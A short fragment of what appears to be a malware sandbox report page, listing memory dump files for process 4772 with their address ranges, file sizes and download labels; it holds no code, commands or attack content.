Filesize
32KB

Download
memory/4772-27-0x000000001B790000-0x000000001B79C000-memory.dmp

Filesize
48KB

Download
memory/4772-26-0x000000001B730000-0x000000001B738000-memory.dmp

Filesize
32KB

Download
memory/4772-25-0x000000001B720000-0x000000001B72C000-memory.dmp

Filesize
48KB

Download
memory/4772-23-0x000000001B710000-0x000000001B71A000-memory.dmp

Filesize
40KB

Download
memory/4772-22-0x000000001B700000-0x000000001B710000-memory.dmp

Filesize
64KB

Download
memory/4772-20-0x0000000002CD0000-0x0000000002CE6000-memory.dmp

Filesize
88KB

Download
memory/4772-21-0x000000001B6F0000-0x000000001B6F8000-memory.dmp

Filesize
32KB

Download
memory/4772-18-0x0000000001240000-0x0000000001248000-memory.dmp

Filesize
32KB

Download
memory/4772-19-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/4772-17-0x000000001B740000-0x000000001B790000-memory.dmp

Filesize
320KB

Download
memory/4772-16-0x0000000001220000-0x000000000123C000-memory.dmp

Filesize
112KB

Download
memory/4772-15-0x0000000001210000-0x0000000001218000-memory.dmp

Filesize
32KB

Download
memory/4772-14-0x0000000001400000-0x000000000140E000-memory.dmp

Filesize
56KB

Download
memory/4772-13-0x0000000000570000-0x0000000000A14000-memory.dmp

Filesize
4.6MB

Download
memory/4772-12-0x00007FFD99923000-0x00007FFD99925000-memory.dmp

Filesize
8KB

Download